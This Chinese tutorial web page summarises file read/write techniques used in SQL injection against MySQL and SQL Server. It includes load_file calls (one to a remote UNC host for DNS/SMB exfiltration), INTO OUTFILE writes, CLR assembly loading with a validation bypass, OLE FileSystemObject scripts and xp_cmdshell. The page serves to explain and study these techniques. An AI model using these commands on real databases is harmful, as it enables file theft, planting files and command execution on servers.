脚本之家 服务器常用软件
快捷导航
您的位置:首页数据库数据库其它 → SQL注入中文件读写

关于SQL注入中文件读写的方法总结

 更新时间:2017年03月21日 08:46:49   作者:该隐  
这篇文章主要给大家介绍了关于SQL注入中文件的读写方法,文中通过示例代码介绍的非常详细,相信对大家具有一定的参考价值,需要的朋友们下面来一起看看吧。

前言

SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。

一、MySQL

读文件

常见的读文件,可以用16进制代替字符串

select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';

2. CLR集成

// 开启CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.NET二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 开启Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件(测试失败,无bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,Oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

总结

以上就是关于SQL注入中文件的读写方法总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。

您可能感兴趣的文章:

相关文章

  • dataGrip显示clickhouse时间字段不正确的问题

    dataGrip显示clickhouse时间字段不正确的问题

    最近做数据迁移碰到一个问题,源数据和目的端数据,导入的时间怎么都差8个小时,本文就来介绍一下如何解决,感兴趣的可以了解一下
    2021-09-09
  • sqlmap之os shell图文详细解析

    sqlmap之os shell图文详细解析

    在面那些出名的安全厂商时,面试官很喜欢问os-shell相关的原理,下面这篇文章主要给大家介绍了关于sqlmap之os shell图文详细解析的相关资料,需要的朋友可以参考下
    2023-03-03
  • Navicat最新永久安装使用方法(推荐)

    Navicat最新永久安装使用方法(推荐)

    Navicat是一款轻量级的用于MySQL连接和管理的工具,非常好用,使用起来方便快捷,简洁,下面我会简单的讲一下其安装以及使用的方法,感兴趣的朋友一起看看吧
    2023-10-10
  • 最新DataGrip2020.2.x破解版激活码的步骤详解(支持Mac/Windows/Linux)

    最新DataGrip2020.2.x破解版激活码的步骤详解(支持Mac/Windows/Linux)

    这篇文章主要介绍了最新DataGrip2020.2.x破解版激活码教程详解(支持Mac/Windows/Linux),本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
    2020-11-11
  • 使用dump transaction with no_log的危险性说明

    使用dump transaction with no_log的危险性说明

    在命令参考手册中的dump transaction with no_log条目下,有一条警告信息告诉你,你应该把这条命令作为没有其它办法时的最后一招才使用它
    2012-07-07
  • MySQL与Oracle数据类型对应关系(表格形式)

    MySQL与Oracle数据类型对应关系(表格形式)

    MySQL与Oracle两种数据库在工作中,都是用的比较多的数据库,由于MySQL与Oracle在数据类型上有部分差异,在我们迁移数据库时,会遇上一定的麻烦,下面介绍MySQL与Oracle数据库数据类型的对应关系
    2017-04-04
  • 关于SQL注入绕过的一些知识点

    关于SQL注入绕过的一些知识点

    网上关于SQL注入的绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
    2017-03-03
  • SQL表连接图解

    SQL表连接图解

    估计很多人在学习SQL表连接的时候都会被各种类型的表连接搞得稀里糊涂的,现在好了,有了下面的图,就可以很直观的区分各种表连接了
    2014-12-12
  • GaussDB数据库事务管理及高级应用

    GaussDB数据库事务管理及高级应用

    GaussDB是华为公司开发的一种数据库产品,它是一种分布式关系型数据库管理系统(RDBMS),这篇文章主要给大家介绍了关于GaussDB数据库事务管理及高级应用的相关资料,文中通过代码介绍的非常详细,需要的朋友可以参考下
    2024-05-05
  • 开源数据库设计神器chiner的安装及初体验介绍

    开源数据库设计神器chiner的安装及初体验介绍

    最近在造轮子,从 0 到 1 的那种,就差前台的界面了,大家可以耐心耐心耐心期待一下。其中需要设计一些数据库表,可以通过 Navicat 这种图形化管理工具直接开搞,也可以通过一些数据库设计工具来搞,比如说 PowerDesigner,更专业一点
    2022-02-02

最新评论